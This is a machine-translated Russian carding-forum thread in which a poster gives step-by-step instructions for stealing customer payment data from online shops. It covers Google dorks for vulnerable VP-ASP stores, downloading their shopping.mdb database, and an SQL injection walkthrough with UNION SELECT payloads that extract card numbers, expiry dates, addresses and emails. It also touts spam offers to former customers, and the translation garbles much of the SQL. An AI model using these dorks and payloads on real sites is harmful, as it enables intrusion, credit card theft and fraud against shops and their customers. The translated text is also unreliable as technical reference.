Поверьте мне, если вы пришлете достаточно электронной почты для бывших клиентов, особенно когда он находится в области здравоохранения и дополнения нишу, если они получают предложение на бутыль 99 центов или что - то, они собираются прыгать во всем этом!
В любом случае, если у вас есть какие - либо вопросы, пожалуйста , не стесняйтесь спросить, и я извиняюсь , если я был немного расплывчат , но у меня нет много времени , прямо сейчас , но хотели , чтобы получить это.
отчет
njfliiboy
Незарегистрированный
Escrow Баланс:
You must be registered for see links
[
You must be registered for see links
]
You must be registered for see links
[Часть 3]
VP-ASP shopadmin уязвимость , чтобы получить доступ к списку номеров кредитных карт, адреса и другие детали клиентов вошли.
И для этого вам понадобится Microsoft Office Access.
1.Go в Google
и добавить в Search Bar Inurl:»shopadmin.asp» Только администратор Магазин администратор
Примечание:
shopadmin.asp это имя определенной веб - страницы , мы можем взломать. Google может найти этот веб - страницу для нас с «Inurl» сроком.
«Магазин только администраторы»
Это в основном часть текста , найденной на веб - страницах , мы можем взломать. Так что, если название веб - страницы «shopadmin.asp»
и находим текст «магазин администраторов только» что страница взломать.
2. Теперь Google возвращается с нашими результатами. Выберите любой из них.
Shopadmin.asp
3. Теперь он запрашивает имя пользователя и пароль. Не беспокойтесь об этом. В адресной строке заменить «shopadmin.asp» с «shopdbtest.asp»
Он должен принять вас на страницу с некоторым infs на нем. Рядом , где он говорит , что «xDatabase» это имя базы данных.
После нахождения страницы Shopdbtest.asp Заменить
shopping.mdb
4. Загрузите файл базы данных и открыть его с доступом или другим программным обеспечением. Найти «клиентов» и вы будете иметь список
деталей заказчика.
5. Удачи!
----------------------------
VP-ASP 6,50
1. Dork:»питание от vpasp против 6,50»
2. Измените URL - адрес для
You must be registered for see links
3. Администратор страницы: shopadmin.asp
MDB Viewer После загрузки Shopping.mdb скачать программу с здесь
DB Viewer.
После opining БД
и может искать детали придумают поиск и принять
отчет
njfliiboy
Незарегистрированный
Escrow Баланс:
You must be registered for see links
[
You must be registered for see links
]
You must be registered for see links
1) мы получили поиск Google для интернет - магазинов, я использовал этот мужлан:
Inurl: customer_testimonials.php testimonial_id =
2) позволяет сказать , что мы получили этот сайт
You must be registered for see links
3) мы должны проверить , если его уязвимым для SQLI, мы добавим это
( ') ,
если мы получим сообщение об ошибке означает сайт его vuln.
4) мы должны проверить номер столбца , мы стараемся с 10 первого
+ заказ + на + 10-
You must be registered for see links
- если мы не получите средства ошибок сайт имеет более 10 столбцов, если мы получим ошибка означает , что веб - сайт имеет менее 10 колонок
5) на этот раз мы получаем ошибку Теперь мы пытаемся от 1 до 9
+ союза + выбор + 1,2,3,4,5 , 6,7,8,9--
You must be registered for see links
- теперь мы обнаружили , что сайт имеет 9 столбцов
6) большую часть времени мы можем получить INFOS из таблицы 3 и 6, позволяет сказать , что теперь мы можем с 3
, теперь мы можем получить пользователя базы данных, имя базы данных и версии базы данных следующим образом: * - пользователь базы данных
You must be registered for see links
- * - имя базы данных
You must be registered for see links
-
You must be registered for see links
) нам нужны имена таблиц добавить это URL: + союз + выбор + 1,2, table_name, 4,5,6,7,8 , 9 + от + Информация rmation_schema.tables--
You must be registered for see links
-Теперь нам нужны столбцы: добавить это URL:
+ союз + выбор + 1,2, CONCAT (table_name, символ (58), Колум n_name), 4,5,6,7,8,9 + от + information_schema.column S--
You must be registered for see links
-отчет
njfliiboy
Незарегистрированный
Escrow Баланс:
You must be registered for see links
[
You must be registered for see links
]
You must be registered for see links
7) Теперь все , что мы должны сделать , это посмотреть заказы и клиент Infos (есть кредитные карты
): если мы добавим это к URL - адрес , мы получим номера кредитных карт, способ оплаты, тип кредитной карты .....
You must be registered for see links
- если добавить к этому URL мы получим много Infos о костюмеров, адрес, номер телефона, электронной почты, почтовый индекс, и Infos кредитных карт всех из них
+ союза + выбор + 1,2, CONCAT (orders_id, 0x2F, cc_type, 0x 2F, cc_owner, 0x2F, cc_number, 0x2F, cc_expires, 0x2F, у.е. stomers_street_address, 0x2F, customers_suburb, 0x2F, customers_city, 0x2F, customers_postcode, 0x2F , пользовательские ers_state, 0x2F, customers_country, 0x2F, customers_te LePhone, 0x2F, customers_email_address, 0x2F, date_pur чеканка), 4,5,6,7,8,9 + от + заказов +
You must be registered for see links
/customer_testimonials.php?&testimonial_id=7+union+ выберите + 1,2, CONCAT (orders_id, 0x2F, cc_type, 0x2F, cc_o wner, 0x2F, cc_number, 0x2F, cc_expires, 0x2F, клиенты _street_address, 0x2F, customers_suburb, 0x2F, Custome rs_city , 0x2F, customers_postcode, 0x2F, customers_sta те, 0x2F, customers_country, 0x2F, customers_telephone, 0x2F, customers_email_address, 0x2F, date_purchased), 4,5,6,7,8,9 + от + заказов +
Теперь один шаг влево
8) получаем кредитные карты и получать удовольствие.
Оффлайн
Tihon74
Заблокирован
- Регистрация
- 25.06.17
- Сообщения
- 2.588
- Реакции
- 71
- Репутация
- 157
Да,Гугл это п....ц! Я чуть не умер,пока разобрался...
Оффлайн
Isildur26
Заблокирован
- Регистрация
- 15.10.17
- Сообщения
- 102
- Реакции
- 38
- Репутация
- 106
Ну да согласен если бы сам переводил еще хуже было бы, кстати есть эксплойт под 7 версию asp в нете